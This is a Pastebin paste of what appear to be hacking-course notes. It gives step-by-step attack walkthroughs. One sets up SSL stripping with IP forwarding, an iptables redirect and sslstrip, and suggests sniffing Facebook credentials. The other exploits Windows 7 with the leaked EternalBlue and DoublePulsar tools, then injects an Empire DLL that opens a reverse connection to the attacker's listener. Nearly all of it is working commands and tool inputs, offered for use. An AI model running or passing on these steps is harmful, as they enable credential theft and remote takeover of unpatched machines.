Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SSL Striping
- ------------
- SSL -->> Secure Socket Layer --> To protect data by encrypting it.
- Used in HTTPS
- s --> Secure --> SSL
- We use 3 commands to perform SSL Striping.
- 1. we forward the ip address
- $ more /proc/sys/net/ipv4/ip_forward
- 0
- $ echo 1 > /proc/sys/net/ipv4/ip_forward
- $ more /proc/sys/net/ipv4/ip_forward
- 1
- 2. To forward and redirect the traffic via different port 8080
- $ nano /etc/ettercap/etter.conf
- LINUX
- IPtables
- iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport
- $ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
- 3. To start SSL Striping
- $ ssltrip -l 8080
- https://www.facebook.com
- https
- HSTS
- ****Try sniffing facebook's cresentials using sslstrip2
- Xerosploit
- ----------
- https://github.com/LionSec/xerosploit.git
- Etternal Blue
- -------------
- EternalBlue Documentation
- -------------------------
- Download Python 2.6 from the link ----> https://www.python.org/download/releases/2.6/
- After installing python you need to pass the path in environmental variables
- "Right click" on "My Computer"
- "Click" on "Properties"
- Goto "Advanced" tab
- "Click" on "Environmental Variables"
- Under "System Variable" table ----> Under "Variable" column
- Select "Path" and click on "edit"
- Type the following
- ;C:\python26\;C:\python26\scripts\;
- click "OK"
- click "OK"
- click "OK"
- Restart you computer
- Download PyWin32 v2.12 from the link ----> Remember it will give you many version just download pywin32-212.win32-py2.6
- https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
- After installing it, restart your computer
- Download a text editor which shows line number too.
- Notepad++ --> https://notepad-plus-plus.org/download/
- Download shadowbroker Project from the link ---> https://github.com/misterch0c/shadowbroker
- Extract the shadowbroker project.
- Copy it in C:\ drive.
- Go to C:\shadowbroker\windows
- 1. There will be a file fb.py
- Open the file in a text editor.
- Goto Line 72 and comment it by puting # in the starting of the 72th line
- save the file and exit.
- 2. There will be a file, Fuzzbunch.xml
- Open that file too in a text editor
- Goto line 19 ---> change the path to C:\shadowbroker\windows\Resources
- Goto line 24 ---> change the path to C:\shadowbroker\windows\logs
- Open command prompt and type
- cd C:\
- cd shadowbroker\windows
- python fb.py
- It will launch the shadowbroker python script
- Default Target IP Address ---> IP Address of Windows 7 ------> hit enter
- Default Callback IP Address ---> IP Address of windows xp -----> hit enter
- Use Redirections ----> type "no" ------> hit enter
- ---> hit enter
- Project[0]:0 ---> select from the list-----> 0 to create a new project ---->hit enter
- Give the project name hit enter
- Type "yes" and hit enter
- On the screen it will show
- fb>
- Now type the following
- fb> use eternalblue -----> hit enter
- type "yes" ---> hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- type "1" ---> hit enter
- type "1" ---> hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- It will start our eternalblue plugin and will ping backdoor in windows 7. After many many lines, it will show Eternalblue Succeeded.
- Open Kali Linux machine
- -----------------------
- Download Empire project from the link -----> https://github.com/EmpireProject/Empire
- Extract and copy Empire project on the desktop.
- Open the terminal, type the following
- cd Desktop
- cd Empire
- cd setup
- chmod 777 install.sh
- ./install.sh
- this will install all the basic libraries for empire.
- python setup-database.py
- cd ..
- chmod 777 empire
- ./empire
- It will start the empire project which will help us in setuping the listener and creating the DLL file for getting access in windows 7
- It will show the following on the terminal
- (Empire) >
- (Empire) > listeners
- (Empire: listeners) > uselistener http
- (Empire: listeners/http) > set Name Eternal
- (Empire: listeners/http) > set Host http://<kali linux IP Address>
- (Empire: listeners/http) > set Port 8080
- (Empire: listeners/http) > set execute
- It will start listening on http://<kali IP Address>:8080
- (Empire: listeners/http) > back
- (Empire: listeners) > list
- (Empire: listeners) > usestagers windows/dll Eternal
- (Empire: windows/dll) > set Arch x64
- (Empire: windows/dll) > execute
- It will create a DLL file named as launcher.dll in /tmp/launcher.dll
- Our kali linux machine will start listening for any reverse connection which will be execute by launcher.dll file on port 8080
- Copy and paste launcher.dll file in windows xp
- Go back to windows xp again, the same terminal which we left opened
- fb Special (EternalBlue) > use Doublepulsar ---> hit enter
- type "yes" ----> hit enter
- hit enter
- hit enter
- type "0" ----> hit enter
- type "1" ----> hit enter
- type "2" ----> hit enter
- complete path of launcher.dll file ----> hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- type "yes" ----> hit enter
- It will start executing launcher.dll in the windows 7 machine.
- After many many lines it will show Doublepulsar Succeeded
- Goto Kali linux machine, in the empire shell terminal, it will show
- (Empire: windows/dll) > Initial agent ****** from <windows 7 IP> now active
- (Empire: windows/dll) > agents
- (Empire: agents) > interact <agent name>
- (Empire: <agent name>) > sysinfo
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement